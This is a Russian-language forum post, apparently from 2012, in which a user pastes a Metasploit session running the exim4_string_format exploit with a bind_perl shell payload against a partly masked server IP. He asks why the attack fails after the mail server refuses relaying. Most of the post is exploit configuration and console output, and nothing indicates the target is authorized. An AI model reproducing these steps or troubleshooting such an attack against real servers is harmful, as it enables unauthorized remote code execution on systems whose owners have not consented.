metasploit - 4.69 remote code execution

Discussion in 'Linux, Freebsd, *nix' started by Pirotexnik, 14 Jul 2012.

  1. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Добрый день. Есть сервер с этим софтом.
    Есть мой комп с метасплоитом.

    Вот такая проблемма:

    Code:
    msf  exploit(exim4_string_format) > show options
    
    Module options (exploit/unix/smtp/exim4_string_format):
    
       Name       Current Setting       Required  Description
       ----       ---------------       --------  -----------
       EHLO_NAME                        no        The name to send in the EHLO
       MAILFROM   root@localhost        yes       FROM address of the e-mail
       MAILTO     postmaster@localhost  yes       TO address of the e-mail
       RHOST      *.38.72.18           yes       The target address
       RPORT      25                    yes       The target port
    
    
    Payload options (cmd/unix/bind_perl):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LPORT  31337            yes       The listen port
       RHOST  *.38.72.18      no        The target address
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf  exploit(exim4_string_format) > exploit
    
    [*] Started bind handler
    [*] Connecting to *.38.72.18:25 ...
    [*] Server: ***** ESMTP Exim 4.69 #1 Sat, 14 Jul 2012 08:38:45 -0400
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
    [*] EHLO: *.com Hello 141-135-*-*.pool.ukrtel.net [*.*.135.141]
    [*] EHLO: 250-SIZE 52428800
    [*] EHLO: 250-PIPELINING
    [*] EHLO: 250-AUTH PLAIN LOGIN
    [*] EHLO: 250-STARTTLS
    [*] EHLO: 250 HELP
    [*] Determined our hostname is 141-135-*-*.pool.ukrtel.net and IP address is *.*.135.141
    [*] MAIL: 250 OK
    [-] Exploit exception: RCPT: 550-141-135-*-*.pool.ukrtel.net (D9qvxQIn.com) [*.*.135.141] is currently
    550-not permitted to relay through this server. Perhaps you have not logged
    550-into the pop/imap server in the last 30 minutes or do not have SMTP
    550 Authentication turned on in your email client.
    msf  exploit(exim4_string_format) >
    Где звездочки - это вместо реальных Ip.

    Что я не так делаю? Спасибо.
     
    #1 Pirotexnik, 14 Jul 2012
    Last edited: 14 Jul 2012